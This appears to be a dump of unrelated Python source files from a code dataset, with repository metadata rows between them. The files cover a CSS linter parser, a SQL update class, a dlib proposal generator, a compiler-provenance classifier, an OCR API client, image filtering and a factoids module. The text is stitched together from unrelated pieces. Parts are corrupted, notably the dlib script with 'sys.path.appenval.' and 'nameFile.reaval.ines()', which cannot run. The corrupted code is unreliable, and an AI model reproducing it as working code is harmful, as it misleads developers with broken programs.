# pred = tf.layers.dense(pred, 64, activation = tf.nn.relu)
# pred = tf.layers.batch_normalization(pred, axis=1)
# pred = tf.layers.dropout(pred, rate = dropout_keep_prob)
# pred = tf.layers.dense(pred, 2, activation = tf.nn.softmax)
# cross_entropy = \
# tf.nn.softmax_cross_entropy_with_logits_v2(
# logits = pred,
# labels = labels
# )
# Accuracy = tf.reduce_mean(
# tf.cast(
# tf.equal(
# tf.argmax(pred, 1),
# tf.argmax(labels, 1)
# ),
# dtype = tf.float32
# ),
# name = "accuracy"
# )
# loss = tf.reduce_mean(cross_entropy, name = "loss")
# optimizer = tf.train.AdamOptimizer(learning_rate).minimize(loss)
# # optimizer = tf.train.MomentumOptimizer(learning_rate, 0.9).minimize(loss)
# return input_data, labels, dropout_keep_prob, optimizer, Accuracy, loss | 40.467797 | 107 | 0.59608 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7,259 | 0.608058 |
7b3cc4dc345dd62020834a44def43b7e9619fb29 | 3,492 | py | Python | cssqc/parser.py | matematik7/CSSQC | f8048435e60f688fef70d1608651d31e1288b4cf | [
"MIT"
]
| null | null | null | cssqc/parser.py | matematik7/CSSQC | f8048435e60f688fef70d1608651d31e1288b4cf | [
"MIT"
]
| null | null | null | cssqc/parser.py | matematik7/CSSQC | f8048435e60f688fef70d1608651d31e1288b4cf | [
"MIT"
]
| null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------
# cssqc/__init__.py
#
# css quality control
# ----------------------------------------------------------------
# copyright (c) 2014 - Domen Ipavec
# Distributed under The MIT License, see LICENSE
# ----------------------------------------------------------------
import importlib
import csslex, cssyacc
from cssyacc.ruleset import Ruleset
from cssqc.statistics import Statistics
EVENTS = (
'IDENT',
'ATKEYWORD',
'ATBRACES',
'STRING',
'HASH',
'NUMBER',
'PERCENTAGE',
'DIMENSION',
'URI',
'UNICODE_RANGE',
'CDO',
'CDC',
'COLON',
'SEMICOLON',
'BRACES_R',
'BRACES_L',
'PARENTHESES_R',
'PARENTHESES_L',
'BRACKETS_R',
'BRACKETS_L',
'COMMENT',
'WS',
'FUNCTION',
'INCLUDES',
'DASHMATCH',
'DELIM',
'Block',
'Brackets',
'Comment',
'Function',
'Parentheses',
'Ruleset',
'Selector',
'Statement',
'Whitespace'
)
instance = None
class CSSQC:
def __init__(self, rules):
global instance
self.events = {}
for e in EVENTS:
self.events[e] = []
self.afterParse = []
self.addRules(rules)
self.parser = cssyacc.getYacc()
self.warnings = []
self.tokens = []
self.objects = []
self.current_token = 0
self.statistics = Statistics()
self.addRuleObject(self.statistics)
instance = self
@staticmethod
def getInstance():
global instance
return instance
def addRules(self, rules):
for rule in rules:
try:
enabled = rules.getboolean(rule)
except:
enabled = True
if enabled:
module = importlib.import_module("cssqc.rules."+rule)
klass = getattr(module, rule)
self.addRuleObject(klass(rules[rule]))
def eventName(self, e):
return "on_"+e
def addRuleObject(self, o):
for e in EVENTS:
f = getattr(o, self.eventName(e), None)
if callable(f):
self.events[e].append(f)
f = getattr(o, "afterParse", None)
if callable(f):
self.afterParse.append(f)
def event(self, e, obj):
for f in self.events[e]:
self.warnings += f(obj)
def register(self, name, obj):
self.objects.append((name, obj))
def token(self):
if len(self.tokens) > self.current_token:
t = self.tokens[self.current_token]
self.current_token += 1
return t
else:
return None
def parse(self, data):
# lex
l = csslex.getLexer()
l.input(data)
# parse tokens
for token in l:
self.tokens.append(token)
self.event(token.type, token)
# yacc
result = self.parser.parse(lexer=self)
for el in result:
if type(el) is Ruleset:
el.setDepth(0)
# parse objects
for obj in self.objects:
self.event(obj[0], obj[1])
# after parse
for f in self.afterParse:
self.warnings += f(result)
# sort warnings
self.warnings.sort(key=lambda qw: qw.line)
return result
| 23.28 | 69 | 0.489977 | 2,416 | 0.691867 | 0 | 0 | 84 | 0.024055 | 0 | 0 | 804 | 0.230241 |
7b3e25ca3f02a2235c0f0ca58913370560e98207 | 3,351 | py | Python | parser/team23/instruccion/update_st.py | webdev188/tytus | 847071edb17b218f51bb969d335a8ec093d13f94 | [
"MIT"
]
| 35 | 2020-12-07T03:11:43.000Z | 2021-04-15T17:38:16.000Z | parser/team23/instruccion/update_st.py | webdev188/tytus | 847071edb17b218f51bb969d335a8ec093d13f94 | [
"MIT"
]
| 47 | 2020-12-09T01:29:09.000Z | 2021-01-13T05:37:50.000Z | parser/team23/instruccion/update_st.py | webdev188/tytus | 847071edb17b218f51bb969d335a8ec093d13f94 | [
"MIT"
]
| 556 | 2020-12-07T03:13:31.000Z | 2021-06-17T17:41:10.000Z | from abstract.instruccion import *
from tools.console_text import *
from tools.tabla_tipos import *
from storage import jsonMode as funciones
from error.errores import *
from tools.tabla_simbolos import *
class update_st (instruccion):
def __init__(self, id1, id2, dato, where, line, column, num_nodo):
super().__init__(line, column)
self.id1 = id1
self.id2 = id2
self.dato = dato
self.where = where
#Nodo AST UPDATE
self.nodo = nodo_AST('UPDATE', num_nodo)
self.nodo.hijos.append(nodo_AST('UPDATE', num_nodo + 1))
self.nodo.hijos.append(nodo_AST(id1, num_nodo + 2))
self.nodo.hijos.append(nodo_AST('SET', num_nodo + 3))
self.nodo.hijos.append(nodo_AST(id2, num_nodo + 4))
self.nodo.hijos.append(nodo_AST('=', num_nodo + 5))
self.nodo.hijos.append(nodo_AST(dato, num_nodo + 6))
if where != None:
self.nodo.hijos.append(where.nodo)
# Gramatica
self.grammar_ = "<TR><TD>INSTRUCCION ::= UPDATE ID SET ID = op_val where; </TD><TD>INSTRUCCION = falta poner accicon;</TD></TR>"
if where != None:
self.grammar_ += where.grammar_
def ejecutar(self):
id_db = get_actual_use()
if self.where != None:
list_id = [self.id1]
val_return = self.where.ejecutar(list_id)
dato_val = self.dato.ejecutar(list_id)
index_col = ts.get_pos_col(id_db, self.id1, self.id2)
index_pk = ts.get_index_pk(id_db, self.id1)
for item in val_return.valor:
dict_registro = {}
count_col = 0
for col in item:
if count_col == index_col:
dict_registro[count_col] = dato_val.valor
else:
dict_registro[count_col] = col
count_col += 1
list_pk = []
for id_pk in index_pk:
list_pk.append(item[id_pk])
resultado = funciones.update(id_db, self.id1, dict_registro, list_pk)
# Valor de retorno: 0 operación exitosa, 1 error en la operación, 2 database no existente, 3 table no existente, 4 llave primaria no existe.
if resultado == 1:
errores.append(nodo_error(self.line, self.column, 'ERROR - No se pudo realizar el update', 'Semántico'))
add_text('ERROR - No se pudo realizar el update\n')
elif resultado == 2:
errores.append(nodo_error(self.line, self.column, 'ERROR - No se encontró la base de datos', 'Semántico'))
add_text('ERROR - No se encontró la base de datos\n')
elif resultado == 3:
errores.append(nodo_error(self.line, self.column, 'ERROR - No se encontro la tabla ' + self.id1, 'Semántico'))
add_text('ERROR - No se encontro la tabla ' + self.id1 + '\n')
elif resultado == 4:
errores.append(nodo_error(self.line, self.column, 'ERROR - No existe la llave primaria', 'Semántico'))
add_text('ERROR - No existe la llave primaria\n')
add_text('Se actualizadon los registros\n')
else:
pass | 41.37037 | 156 | 0.5661 | 3,153 | 0.938672 | 0 | 0 | 0 | 0 | 0 | 0 | 700 | 0.208395 |
7b3e6682a8f4db3e33235458e638c05f2e380911 | 1,791 | py | Python | ncfm/generate_proposals.py | kirk86/kaggle | 8178ed790bc1f8fcd2cd7a01560e5f25f01c07cc | [
"MIT"
]
| null | null | null | ncfm/generate_proposals.py | kirk86/kaggle | 8178ed790bc1f8fcd2cd7a01560e5f25f01c07cc | [
"MIT"
]
| null | null | null | ncfm/generate_proposals.py | kirk86/kaggle | 8178ed790bc1f8fcd2cd7a01560e5f25f01c07cc | [
"MIT"
]
| null | null | null | # import sys
# sys.path.appenval.'/usr/local/lib/python2.7/site-packages')
import dlib
import scipy
import skimage as io
import numpy as np
def dlib_selective_search(orig_img, img_scale, min_size, dedub_boxes=1./16):
rects = []
dlib.find_candidate_object_locations(orig_img, rects, min_size=min_size)
# proposals = []
# for key, val in enumerate(rects):
# # templist = [val.left(), val.top(), val.right(), val.bottom()]
# templist = [val.top(). val.left(), val.bottom(), val.right()]
# proposals.append(templist)
# proposals = np.array(proposals)
# 0 maybe used for bg, no quite sure
rects = [[0., d.left() * img_scale * dedub_boxes,
d.top() * img_scale * dedub_boxes,
d.right() * img_scale * dedub_boxes,
d.bottom() * img_scale * dedub_boxes] for d in rects]
# bbox pre-processing
# rects *= img_scale
v = np.array([1, 1e3, 1e6, 1e9, 1e12])
# hashes = np.round(rects * dedub_boxes).dot(v)
hashes = np.round(rects).dot(v)
_, index, inv_index = np.unique(hashes, return_index=True,
return_inverse=True)
rects = np.array(rects)[index, :]
return rects
imagenet_path = 'path/to/imagenet/val.ta/Images'
names = 'path/to/imagenet/val.ta/ImageSets/train.txt'
count = 0
all_proposals = []
imagenms = []
nameFile = open(names)
for line in nameFile.reaval.ines():
filename = imagenet_path + line.split('\n')[0] + '.png'
single_proposal = dlib_selective_search(filename)
all_proposals.apped(single_proposal)
count += 1
print count
scipy.savemat('train.mat', mdict={'all_boxes': all_proposals,
'images': imagenms})
obj_proposals = scipy.loadmat('train.mat')
print(obj_proposals)
| 33.166667 | 76 | 0.634841 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 577 | 0.322166 |
7b405010c115340a11d63243786f96de4c6d44a6 | 3,953 | py | Python | comp_prov.py | RickyMexx/ML_CompilerProvenance | ce19276aa93b01fa6cdd275e5c0514cb0e9a9f45 | [
"Apache-2.0"
]
| null | null | null | comp_prov.py | RickyMexx/ML_CompilerProvenance | ce19276aa93b01fa6cdd275e5c0514cb0e9a9f45 | [
"Apache-2.0"
]
| null | null | null | comp_prov.py | RickyMexx/ML_CompilerProvenance | ce19276aa93b01fa6cdd275e5c0514cb0e9a9f45 | [
"Apache-2.0"
]
| null | null | null | # each JSON has: {instructions}, {opt}, {compiler}
# MODEL SETTINGS: please set these before running the main #
mode = "opt" # Labels of the model: [opt] or [compiler]
samples = 3000 # Number of the blind set samples
fav_instrs_in = ["mov"] # Set of instructions of which DEST register should be extracted [IN]
fav_instrs_eq = ["lea"] # Set of instructions of which DEST register should be extracted [EQ]
# -------------- #
# import warnings filter
from warnings import simplefilter
# ignore all future warnings
simplefilter(action='ignore', category=FutureWarning)
import json
import csv
from sklearn.model_selection import train_test_split
from sklearn.feature_extraction.text import *
from sklearn.metrics import confusion_matrix, classification_report, log_loss
from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier
import scikitplot as skplt
import matplotlib.pyplot as plt
# Function that parses the input file
# Dataset can be 1 (train) or 2 (blind test)
def processFile(name, i, o, c, dataset):
with open(name) as f:
for jsonl in f:
tmp = json.loads(jsonl)
i.append(tmp['instructions'])
if (dataset == 1):
o.append(tmp['opt'])
c.append(tmp['compiler'])
for idx in range(len(i)):
start = ""
for word in i[idx]:
tmp = ""
arr = word.split()
flag = True
for ins1 in fav_instrs_in:
if ins1 in arr[0]:
flag = False
tmp = arr[0] + " " + arr[1] + " "
for ins2 in fav_instrs_eq:
if ins2 == arr[0]:
flag = False
tmp = arr[0] + " " + arr[1] + " "
if flag:
tmp = arr[0] + " "
start += tmp
i[idx] = start
# Function that deals with the csv file
# Index can be: 1 (opt) or 2 (compiler)
def produceOutput(name, out, index):
if index != 0 and index != 1:
return
lines = list()
with open(name, "r") as fr:
rd = csv.reader(fr)
lines = list(rd)
if not lines:
lines = [None] * samples
for i in range(samples):
lines[i] = ["--", "--"]
for i in range(samples):
lines[i][index] = out[i]
with open(name, "w") as fw:
wr = csv.writer(fw)
wr.writerows(lines)
if __name__ == "__main__":
index = 1 if mode == "opt" else 0
instrs = list()
opt = list()
comp = list()
processFile("train_dataset.jsonl", instrs, opt, comp, 1)
vectorizer = CountVectorizer(min_df=5)
#vectorizer = TfidfVectorizer(min_df=5)
X_all = vectorizer.fit_transform(instrs)
y_all = opt if mode == "opt" else comp
X_train, X_test, y_train, y_test = train_test_split(X_all, y_all, test_size=0.2, random_state=15)
#model = RandomForestClassifier(n_estimators=200).fit(X_train, y_train)
model = GradientBoostingClassifier(n_estimators=200, max_depth=7).fit(X_train, y_train)
print("Outcomes on test set")
pred = model.predict(X_test)
print(confusion_matrix(y_test, pred))
print(classification_report(y_test, pred))
ll = log_loss(y_test, model.predict_proba(X_test))
print("Log Loss: {}".format(ll))
#skplt.metrics.plot_precision_recall_curve(y_test, model.predict_proba(X_test), title="MOGB")
#skplt.metrics.plot_confusion_matrix(y_test, pred, normalize=True, title="MOGB")
#plt.show()
# Calculating the overfitting
print("Outcomes on training set")
pred2 = model.predict(X_train)
print(confusion_matrix(y_train, pred2))
print(classification_report(y_train, pred2))
# Predicting the blind dataset
b_instrs = list()
processFile("test_dataset_blind.jsonl", b_instrs, list(), list(), 2)
b_X_all = vectorizer.transform(b_instrs)
b_pred = model.predict(b_X_all)
produceOutput("1743168.csv", b_pred, index)
| 30.407692 | 101 | 0.625348 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,132 | 0.286365 |
7b42bb511e27ed76adb521890d7b12af28eb727f | 206 | py | Python | project/striide/urls.py | Striide/DjangoRestApi | db4bec3bf5ac7b60021a5e28d67a054d80ed307f | [
"MIT"
]
| null | null | null | project/striide/urls.py | Striide/DjangoRestApi | db4bec3bf5ac7b60021a5e28d67a054d80ed307f | [
"MIT"
]
| null | null | null | project/striide/urls.py | Striide/DjangoRestApi | db4bec3bf5ac7b60021a5e28d67a054d80ed307f | [
"MIT"
]
| null | null | null | from django.contrib import admin
from django.conf.urls import url, include
# Wire up our API using automatic URL routing.
# Additionally, we include login URLs for the browsable API.
urlpatterns = [
] | 25.75 | 60 | 0.762136 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 106 | 0.514563 |
7b42bde77e1661a4f0f1591879e395dd1510705b | 2,266 | py | Python | task.py | init-helpful/jsontasks | 2cfc0b9b7e5f0ece9d753037f2d6dacf2c165f6e | [
"MIT"
]
| null | null | null | task.py | init-helpful/jsontasks | 2cfc0b9b7e5f0ece9d753037f2d6dacf2c165f6e | [
"MIT"
]
| null | null | null | task.py | init-helpful/jsontasks | 2cfc0b9b7e5f0ece9d753037f2d6dacf2c165f6e | [
"MIT"
]
| null | null | null | from jsonlink import JsonLink
from globals import read_json_file
class Task(JsonLink):
def __init__(
self,
name="",
task_description=None,
step_groupings=[],
global_values={},
global_hooks={},
steps=[],
python_dependencies=[],
keywords_file_path="",
):
self.task_name = name
self.task_description = task_description
self.step_groupings = step_groupings
self.global_values = global_values
self.global_hooks = global_hooks
self.steps = steps
self.python_dependencies = python_dependencies
super(Task, self).__init__(
keywords_file_path=keywords_file_path,
attribute_filters=["__", "parse"],
sub_classes=[Step],
)
def __repr__(self):
return f"""
Name : {self.task_name.upper()}
Description : {self.task_description}
Global Values : {self.global_values}
Groupings : {self.step_groupings}
Hooks : {self.global_hooks}
Steps : {self.steps}
"""
# def step_name(self, *args):
# self.__update_value_in_step("name", args)
# def __update_value_in_step(self, property_to_update, args):
# self.current_task.update_step(
# index=get_indexes(path(args), return_last_found=True),
# variables={property_to_update: value(args)},
# )
# def parse(self, task, task_name=""):
# self.current_task = Task()
# return self.current_task
class Step:
def __init__(
self,
step_name="",
step_description="",
data_hooks={},
associated_data={},
dependent_on={},
):
self.name = step_name
self.description = step_description
self.hooks = data_hooks
self.data = associated_data
self.dependent_on = dependent_on
def __repr__(self):
return f"""
Name : {self.name}
Description : {self.description}
Hooks : {self.hooks}
Data : {self.data}
Dependent On : {self.dependent_on}
"""
task = Task()
task.update_from_dict(read_json_file("exampletask.json"))
print(task)
| 26.97619 | 68 | 0.581642 | 2,107 | 0.929832 | 0 | 0 | 0 | 0 | 0 | 0 | 916 | 0.404237 |
7b4355b686014d85c2cc35d093973bc84723e068 | 5,252 | py | Python | sight_api/__init__.py | siftrics/sight-python | dd162b54efa856cd15955791bbdb563b3ca9cd35 | [
"Apache-2.0"
]
| 1 | 2020-02-23T19:08:39.000Z | 2020-02-23T19:08:39.000Z | sight_api/__init__.py | siftrics/sight-python | dd162b54efa856cd15955791bbdb563b3ca9cd35 | [
"Apache-2.0"
]
| null | null | null | sight_api/__init__.py | siftrics/sight-python | dd162b54efa856cd15955791bbdb563b3ca9cd35 | [
"Apache-2.0"
]
| null | null | null | # Copyright © 2020 Siftrics
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
__version__ = '1.2.0'
import base64
import requests
import time
def _getOrElse(json, key):
if key not in json:
raise Exception('This should never happen. Got successful HTTP status code (200) but the body was not the JSON we were expecting.')
return json[key]
class Client:
def __init__(self, api_key):
self.api_key = api_key
def doPoll(self, pollingURL, files):
fileIndex2HaveSeenPages = [list() for _ in files]
while True:
response = requests.get(
pollingURL,
headers={ 'Authorization': 'Basic {}'.format(self.api_key) },
)
response.raise_for_status()
json = response.json()
pages = _getOrElse(json, 'Pages')
if not pages:
time.sleep(0.5)
continue
for page in pages:
fileIndex = _getOrElse(page, 'FileIndex')
pageNumber = _getOrElse(page, 'PageNumber')
numberOfPagesInFile = _getOrElse(page, 'NumberOfPagesInFile')
if not fileIndex2HaveSeenPages[fileIndex]:
fileIndex2HaveSeenPages[fileIndex] = [False]*numberOfPagesInFile
fileIndex2HaveSeenPages[fileIndex][pageNumber-1] = True
yield json['Pages']
haveSeenAllPages = True
for l in fileIndex2HaveSeenPages:
if not l:
haveSeenAllPages = False
break
if not all(l):
haveSeenAllPages = False
break
if haveSeenAllPages:
return
time.sleep(0.5)
def recognizeAsGenerator(self, files, words=False, autoRotate=False, exifRotate=False):
payload = {
'files': [],
'makeSentences': not words, # make love not bombs
'doAutoRotate': autoRotate,
'doExifRotate': exifRotate
}
for f in files:
fn = f.lower()
if fn.endswith('.pdf'):
mimeType = 'application/pdf'
elif fn.endswith('.bmp'):
mimeType = 'image/bmp'
elif fn.endswith('.gif'):
mimeType = 'image/gif'
elif fn.endswith('.jpeg'):
mimeType = 'image/jpeg'
elif fn.endswith('.jpg'):
mimeType = 'image/jpg'
elif fn.endswith('.png'):
mimeType = 'image/png'
else:
msg = '{} does not have a valid extension; it must be one of ".pdf", ".bmp", ".gif", ".jpeg", ".jpg", or ".png".'.format(f)
raise Exception(msg)
with open(f, 'rb') as fileObj:
base64File = base64.b64encode(fileObj.read())
payload['files'].append({
'mimeType': mimeType,
'base64File': base64File.decode('utf-8'),
})
response = requests.post(
'https://siftrics.com/api/sight/',
headers={ 'Authorization': 'Basic {}'.format(self.api_key) },
json=payload,
)
response.raise_for_status()
json = response.json()
if 'PollingURL' in json:
for pages in self.doPoll(json['PollingURL'], files):
yield pages
return
if 'RecognizedText' not in json:
raise Exception('This should never happen. Got successful HTTP status code (200) but the body was not the JSON we were expecting.')
page = {
'Error': '',
'FileIndex': 0,
'PageNumber': 1,
'NumberOfPagesInFile': 1
}
page.update(json)
yield [page]
return
def recognize(self, files, words=False, autoRotate=False, exifRotate=False):
if type(files) is not list:
msg = 'You must pass in a list of files, not a {}'.format(type(files))
raise TypeError(msg)
pages = list()
for ps in self.recognizeAsGenerator(
files, words=words, autoRotate=autoRotate, exifRotate=exifRotate):
pages.extend(ps)
return pages
| 40.091603 | 143 | 0.581493 | 3,886 | 0.739768 | 3,362 | 0.640015 | 0 | 0 | 0 | 0 | 1,908 | 0.363221 |
7b443c8f7fa19307b9a833a456473a9a811c2e29 | 190 | py | Python | back-end/erasmail/emails/admin.py | SamirM-BE/ErasMail | 88602a039ae731ca8566c96c7c4d2635f82a07a5 | [
"Apache-2.0"
]
| 7 | 2021-02-06T21:06:23.000Z | 2022-01-31T09:33:26.000Z | back-end/erasmail/emails/admin.py | SamirM-BE/ErasMail | 88602a039ae731ca8566c96c7c4d2635f82a07a5 | [
"Apache-2.0"
]
| null | null | null | back-end/erasmail/emails/admin.py | SamirM-BE/ErasMail | 88602a039ae731ca8566c96c7c4d2635f82a07a5 | [
"Apache-2.0"
]
| 5 | 2021-05-07T15:35:25.000Z | 2022-03-21T09:11:24.000Z | from django.contrib import admin
from .models import Attachment, EmailHeaders, Newsletter
admin.site.register(EmailHeaders)
admin.site.register(Attachment)
admin.site.register(Newsletter)
| 23.75 | 56 | 0.836842 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
7b47c5080977b6ed437b3d285f1ec4ab43d82e70 | 145 | py | Python | acronym.py | MathewsPeter/PythonProjects | 4ea83a317452f8abd2c9c1273753037de263f88f | [
"MIT"
]
| null | null | null | acronym.py | MathewsPeter/PythonProjects | 4ea83a317452f8abd2c9c1273753037de263f88f | [
"MIT"
]
| null | null | null | acronym.py | MathewsPeter/PythonProjects | 4ea83a317452f8abd2c9c1273753037de263f88f | [
"MIT"
]
| null | null | null | fullform = input("Enter a full form: ")
words = fullform.split(" ")
acro = ""
for word in words:
acro+=word[0]
print("Acronym is ", acro) | 24.166667 | 39 | 0.62069 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 39 | 0.268966 |
7b480f2ef9a1cf0b8da2461f923c649d122517ca | 514 | py | Python | Usuario.py | Josh0105/SESION9 | 90421c3573e66c5d4bdf93c52c67658b9de03977 | [
"Apache-2.0"
]
| 1 | 2020-10-20T04:02:49.000Z | 2020-10-20T04:02:49.000Z | Usuario.py | Josh0105/Sesion9 | 90421c3573e66c5d4bdf93c52c67658b9de03977 | [
"Apache-2.0"
]
| null | null | null | Usuario.py | Josh0105/Sesion9 | 90421c3573e66c5d4bdf93c52c67658b9de03977 | [
"Apache-2.0"
]
| null | null | null |
class Usuario:
def __init__(self, id, usuario, passw):
self.id = id
self.usuario = usuario
self.passw = passw
def autenticar(self, usuario, passw):
if self.usuario == usuario and self.passw == passw:
print("La autenticación fue correcta")
return True
print ("La autenticación fue incorrecta")
return False
def dump(self):
return {
'id' : self.id,
'nombre' : self.usuario
} | 19.769231 | 59 | 0.533074 | 515 | 0.998062 | 0 | 0 | 0 | 0 | 0 | 0 | 78 | 0.151163 |
7b483bc7a8258807d0838c4087de8c2c75b55797 | 802 | py | Python | 10_54_sobel_filter.py | Larilok/image_processing | 331e50ecd127ba61d6a59a51b7e90f0fd31c7a29 | [
"MIT"
]
| null | null | null | 10_54_sobel_filter.py | Larilok/image_processing | 331e50ecd127ba61d6a59a51b7e90f0fd31c7a29 | [
"MIT"
]
| null | null | null | 10_54_sobel_filter.py | Larilok/image_processing | 331e50ecd127ba61d6a59a51b7e90f0fd31c7a29 | [
"MIT"
]
| null | null | null | from skimage import img_as_int
import cv2
import numpy as np
from pylab import *
import scipy.ndimage.filters as filters
#img = cv2.imread('images/profile.jpg', 0)
img = cv2.imread('images/moon.jpg',0)
sobel_operator_v = np.array([
[-1, 0, 1],
[-2, 0 ,2],
[-1, 0, 1]
])
sobelX = cv2.Sobel(img, -1, 1, 0, ksize=5)
sobelY = cv2.Sobel(img, -1, 0, 1, ksize=5)
subplot(2,2,1)
plt.imshow(sobelX, cmap='gray')
plt.title('(-1, 1, 0)')
subplot(2,2,2)
plt.imshow(sobelY, cmap='gray')
plt.title('(-1, 0, 1)')
subplot(2,2,3)
plt.imshow(filters.convolve(img_as_int(img), sobel_operator_v), cmap='gray')
plt.title('sobel vertical')
subplot(2,2,4)
plt.imshow(filters.convolve(img_as_int(img), sobel_operator_v.T), cmap='gray')
plt.title('sobel horizontal')
plt.show()
| 22.277778 | 79 | 0.649626 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 142 | 0.177057 |
7b4b9aebba4c243de4aa31a177c2640cf3ee6e9d | 199 | py | Python | src/gluonts/model/prophet/__init__.py | rlucas7/gluon-ts | f8572ab4daeb01a05aa88a252bb67ec9062ee150 | [
"Apache-2.0"
]
| null | null | null | src/gluonts/model/prophet/__init__.py | rlucas7/gluon-ts | f8572ab4daeb01a05aa88a252bb67ec9062ee150 | [
"Apache-2.0"
]
| null | null | null | src/gluonts/model/prophet/__init__.py | rlucas7/gluon-ts | f8572ab4daeb01a05aa88a252bb67ec9062ee150 | [
"Apache-2.0"
]
| null | null | null | # Relative imports
from ._estimator import ProphetEstimator
from ._predictor import ProphetPredictor, PROPHET_IS_INSTALLED
__all__ = ['ProphetEstimator', 'ProphetPredictor', 'PROPHET_IS_INSTALLED']
| 33.166667 | 74 | 0.834171 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 76 | 0.38191 |
7b4bc6101cb34fe0e28e691b6f51e4ac042ddfb6 | 4,995 | py | Python | DEPENDENCIES/seash/modules/factoids/__init__.py | kevinkenzhao/Repy2 | a7afb4c8ba263c8a74775a6281a50d94880a8d34 | [
"MIT"
]
| null | null | null | DEPENDENCIES/seash/modules/factoids/__init__.py | kevinkenzhao/Repy2 | a7afb4c8ba263c8a74775a6281a50d94880a8d34 | [
"MIT"
]
| null | null | null | DEPENDENCIES/seash/modules/factoids/__init__.py | kevinkenzhao/Repy2 | a7afb4c8ba263c8a74775a6281a50d94880a8d34 | [
"MIT"
]
| null | null | null | """
<Filename>
factoids/__init__.py
<Purpose>
Used to print saesh factoids.
It implements the following command:
show factoids [number of factoids]/all
"""
import seash_exceptions
import random
import os
# List which will contain all factoids after fatching from a file.
factoids = []
def initialize():
"""
<Purpose>
Used to print random seash factoid when user runs seash.
<Arguments>
None
<Side Effects>
Prints random factoid onto the screen.
<Exceptions>
UserError: Error during generating path to "factoid.txt" file or
Error while opening, reading or closing "factoid.txt" file.
<Return>
None
"""
# Global 'factoids' list will be used to store factoids, fetched from a file.
global factoids
# Path to "factoid.txt" file is created.
try:
current_path = os.getcwd()
file_path = os.path.join(current_path, "modules", "factoids", "factoid.txt")
except OSError, error:
raise seash_exceptions.InitializeError("Error during initializing factoids module: '" + str(error) + "'.")
# We have to fatch list of factoids from "factoid.txt" file.
try:
file_object = open(file_path, 'r')
factoids_temp = file_object.readlines()
file_object.close()
except IOError, error:
raise seash_exceptions.InitializeError("Error during initializing factoids module: '" + str(error) + "'.")
# Newline characters in a list, read from a file are removed.
for factoid in factoids_temp:
factoids.append(factoid.strip('\n'))
# A random factoid is printed every time user runs seash.
print random.choice(factoids)+"\n"
def cleanup():
"""
<Purpose>
Used to clean 'factoids' list when this module is going to be disabled.
<Arguments>
None
<Side Effects>
None
<Exceptions>
None
<Return>
None
"""
# Data from a global 'factoids' list will be removed.
global factoids
factoids = []
def print_factoids(input_dict, environment_dict):
"""
<Purpose>
Used to print seash factoids when user uses 'show factoids'
command.
<Arguments>
input_dict: Input dictionary generated by seash_dictionary.parse_command().
environment_dict: Dictionary describing the current seash environment.
For more information, see command_callbacks.py's module docstring.
<Side Effects>
Prints factoids onto the screen.
<Exceptions>
UserError: If user does not type appropriate command.
ValueError: If user does not provide valid input (integer).
<Return>
None
"""
# User will insert an argument regarding how many factoids should be printed.
# We have to find what is user argument.
# User can type any positive number or he can type 'all' to see all factoids.
dict_mark = input_dict
try:
command = dict_mark.keys()[0]
while dict_mark[command]['name'] != 'args':
dict_mark = dict_mark[command]['children']
command = dict_mark.keys()[0]
args = command
except IndexError:
raise seash_exceptions.UserError("\nError, Syntax of the command is: show factoids [number of factoids]/all \n")
# User decided to print all factoids
if args == 'all':
print
for factoid in factoids:
print factoid
print
return
# User can not insert other than integer number.
try:
no_of_factoids = int(args)
except ValueError:
raise seash_exceptions.UserError("\nYou have to enter number only.\n")
# If number of factoids decided by user is greater than total number of
# available factoids than whole factoids list is printed.
if (no_of_factoids > (len(factoids))):
print "\nWe have only %d factoids. Here is the list of factoids:" % (len(factoids))
no_of_factoids = len(factoids)
elif (no_of_factoids <= 0):
raise seash_exceptions.UserError("\nYou have to enter positive number only.\n")
# 'factoids' list will be shuffled every time for printing random factoids.
random.shuffle(factoids)
# Factoids will be printed.
for factoid in factoids[:no_of_factoids]:
print factoid
print
command_dict = {
'show': {'name':'show', 'callback': None, 'children':{
'factoids':{'name':'factoids', 'callback': print_factoids,
'summary': "Displays available seash factoids.",
'help_text': '','children':{
'[ARGUMENT]':{'name':'args', 'callback': None, 'children':{}}
}},}}
}
help_text = """
Factoids Module
This module includes command that prints seash factoids.
'show factoids [number of factoids]/all' is used to print
available seash factoids.
You can type 'show factoids [number of factoids]' to print
that much number of factoids.
You can type 'show factoids all' to see all available factoids.
"""
# This is where the module importer loads the module from.
moduledata = {
'command_dict': command_dict,
'help_text': help_text,
'url': None,
'initialize': initialize,
'cleanup': cleanup
} | 26.289474 | 116 | 0.680881 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,243 | 0.649249 |
7b4d5102e41f930744e5fe944b292c3c7d93fe14 | 2,985 | py | Python | tests/test_detailed.py | TarasRudnyk/python-telegram-bot-calendar | 6bca67e1e4ac1e9cc187d2370ba02a6df9ed60a4 | [
"MIT"
]
